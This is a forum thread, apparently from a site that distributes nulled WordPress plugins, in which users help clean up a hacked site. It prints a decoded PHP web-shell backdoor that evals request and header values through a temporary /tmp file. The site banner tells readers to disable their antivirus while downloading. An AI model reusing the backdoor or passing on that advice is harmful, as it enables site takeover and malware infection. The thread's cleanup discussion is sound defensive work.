• AÉZA — CLOUD SERVERS FROM 0.02€/HOUR WITH ANTIDDOS PROTECTION

  • You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

    Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

Wordpress site hacked

drakus said:
did not sound like you knew that.
Click to expand...
them how would i have found them in the first place? I even stated that they were off the 80 char screen, on the far right so obviously, i knew they were there
 
drakus said:
You can call BS all you want. I am not the one that got hacked twice.

I run them to try them out, if I like them, than I purchase them to support the authors.
Click to expand...
No worries... you did try to help and I appreciate your advice but I gotta tell you, I also have a local test environment and it too can get infected. But like I said, no worries, thank you for your help
 
Sebrof said:
No worries... you did try to help and I appreciate your advice but I gotta tell you, I also have a local test environment and it too can get infected. But like I said, no worries, thank you for your help
Click to expand...
Yes it can, run on a seperate vlan and all traffic blocked except to my ip.

also show us a list of plugins, maybe we know of one that has had a security issue to cause this.
 
NEVER MIND - THE CODE WAS ALREADY ANSWERED ABOVE.... PLS IGNORE

so can anyone decode this text - it was at the top of a lot of infected files.
I tried to Ctrl-V to insert the text inside a quote tag, but it wouldn't let me so I attached via the attached text file
 

Attachments

  • hacker.txt
    928 bytes · Views: 10
Sebrof said:
so can anyone decode this text - it was at the top of a lot of infected files.
I tried to Ctrl-V to insert the text inside a quote tag, but it wouldn't let me so I attached via the attached text file
Click to expand...
  1. Code: 
    $c = "@eval($_REQUEST["If-Unmodified-Since\"]);@eval($_HEADERS["If-Unmodified-Since"]);";

$_HEADERS = getallheaders();if(isset($_HEADERS['If-Modified-Since'])){$c="@eval($_REQUEST["Clear-Site-Data"]);@eval($_HEADERS["Clear-Site-Data"]);";$f='/tmp/.'.time();@file_put_contents($f, $c);@include($f);@unlink($f);}

$c = "@eval($_REQUEST["If-
Unmodified-Since\"]);@eval($_H
EADERS["If-Unmodified-Since"]);";
 
drakus said:
Here is the file decrypted

  1. PHP: 
    $_HEADERS = getallheaders();
if (isset($_HEADERS['X-Dns-Prefetch-Control'])) {
$c = "@eval($_REQUEST["If-Unmodified-Since\"]);@eval($_HEADERS["If-Unmodified-Since"]);";
$f = .time();
file_put_contents($f, $c);
include($f);
unlink($f);
}
Click to expand...

Would you help me by showing how you decoded that string?
 
slvrsteele said:
@Sebrof each cron entry is attached to a plugin. You may get a copy of them on your local computer and check one by one.
Redownload all sources from where you got them then compare with the ones on your site.
If all are clear or identical with original downloaded files then get full wordpress folder and compare it with original version of wordpress downloaded from wordpress.org.
Somewhere a file has been edited to include malicious script that is running trough cron.
Click to expand...

will each plugin have it's own folder with it's cron entry?

The plugins on the site, if they are nulled, came from here and are at least one year old. I always balked at updating a nulled script if it seemed to be working fine. Maybe I should redownload the latest and then reinstall. The one that at this point seem sketchy, is WPFORM
 
A good idea would be to check your plugins and their versions to public vulnerability database. You'll find out that some previous versions are vulnerable to different types of attacks and they were patched in newer versions.
WPforms is one of the most vulnerable plugins.
 
here is a suspicious plugin that I don't remember installing:
wp-lazyload-AMjRzLNlt3HSvce0-module
Has one file in it called: wp-lazyload.php
Attached - I renamed to .txt, actually a .php
 
wordfence is doing a great job of blocking logins - but I have no idea what criteria it is using to do these blocks. I haven't setup any "blocking" criteria. How is it knowing what logins are to be blocked?
 
Sebrof said:
wordfence is doing a great job of blocking logins - but I have no idea what criteria it is using to do these blocks. I haven't setup any "blocking" criteria. How is it knowing what logins are to be blocked?
Click to expand...

Firewall Options - Wordfence

Change the firewall status mode, optimize the firewall and configure advanced options.
www.wordfence.com

Wordfence Premium - Wordfence

Wordfence Premium comes with real-time firewall protection, real-time scan signatures, an IP address blocklist, country blocking, and Premium support.
www.wordfence.com
 
Sebrof said:
will each plugin have it's own folder with it's cron entry?

The plugins on the site, if they are nulled, came from here and are at least one year old. I always balked at updating a nulled script if it seemed to be working fine. Maybe I should redownload the latest and then reinstall. The one that at this point seem sketchy, is WPFORM
Click to expand...
WPForm has had quite a few vulnerabilites and could be the culprit. The other one you stated is a lazy loader plugin, not sure why it has all the extra characters in it for I do not use it.

What version was the WPForm?

1.5.82
1.5.9
1.7.7
and several other versions have cross site scripting or authentication cross site and some also have sql injection vulnerabilities.

And like Custom B stated, wordfence premium is the way to go, not the nulled version. This way it gets updated (I think twice a day) with new definitions and ip blocks.
 
Updated wpforms to the latest, now updating the rest of the plugins. Site seems to have calmed down except for a crapload of login attempts, all blocked by Wordfence.
 
Sebrof said:
Updated wpforms to the latest, now updating the rest of the plugins. Site seems to have calmed down except for a crapload of login attempts, all blocked by Wordfence.
Click to expand...
You will always have log in attempts since it is wordpress. Wordpress is one of the most attacked cms's there is.

If you are on a dedicated server or a VPS, you can block and control more aspects of everything, if shared, very limited so you have to what you can to protect your site. Starting off with wordfence is a very good choice especially if you went premium. I know yesterday they sent out an email about woocommerce payments plugin with critical bypass takeover. They are always on top of things.

Wish you the best of luck to not get hacked again, keep the mods updated!
 
i finally got the site 100% clean... wpforms was the main issue... if I had just updated it, any bad files with different names than those in the core would still be there so to be safe, I renamed WPFORMS to kill_wpForms then re-installed a fresh wpforms, then compared the folder and yep, just as I suspected, extra files in the original that would still be there had I just re-installed over the old installation.

Now the scan results look like this: (finally)

1679695766245.png

Thx for all the help from everyone... what a mess I had - would still be like that without the help of this site - another donation about to be processed
 
  • Like
  • Love
Reactions: Panzacode, BlackMAry, slvrsteele and 2 others
Sebrof said:
i finally got the site 100% clean... wpforms was the main issue... if I had just updated it, any bad files with different names than those in the core would still be there so to be safe, I renamed WPFORMS to kill_wpForms then re-installed a fresh wpforms, then compared the folder and yep, just as I suspected, extra files in the original that would still be there had I just re-installed over the old installation.

Now the scan results look like this: (finally)

1679695766245.png

Thx for all the help from everyone... what a mess I had - would still be like that without the help of this site - another donation about to be processed
Click to expand...
glad you got it all fixed up!
 
You must log in or register to reply here.

Similar threads

S
Wordpress Site hacked
Replies
9
Views
1K
General Discussion
alexmisaila
A
S
How to Secure Wordpress Site?
Replies
1
Views
300
General Discussion
Ignoreorders
Ignoreorders
B
Any Wordpress Or Web Developer Can help me to create Site
Replies
7
Views
494
General Discussion
livework
L
Booro
How to create a wiki and cataloglist site? Wordpress
Replies
0
Views
291
General Discussion
Booro
Booro
aplusk777
[ASK] How to share blogger post into wordpress site?
Replies
2
Views
431
General Discussion
aplusk777
aplusk777

Latest posts

Forum statistics

Threads
79,402
Messages
1,141,143
Members
248,085
Latest member
Jonibek_05

Share this page

Share this page
Top Bottom
Back
AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock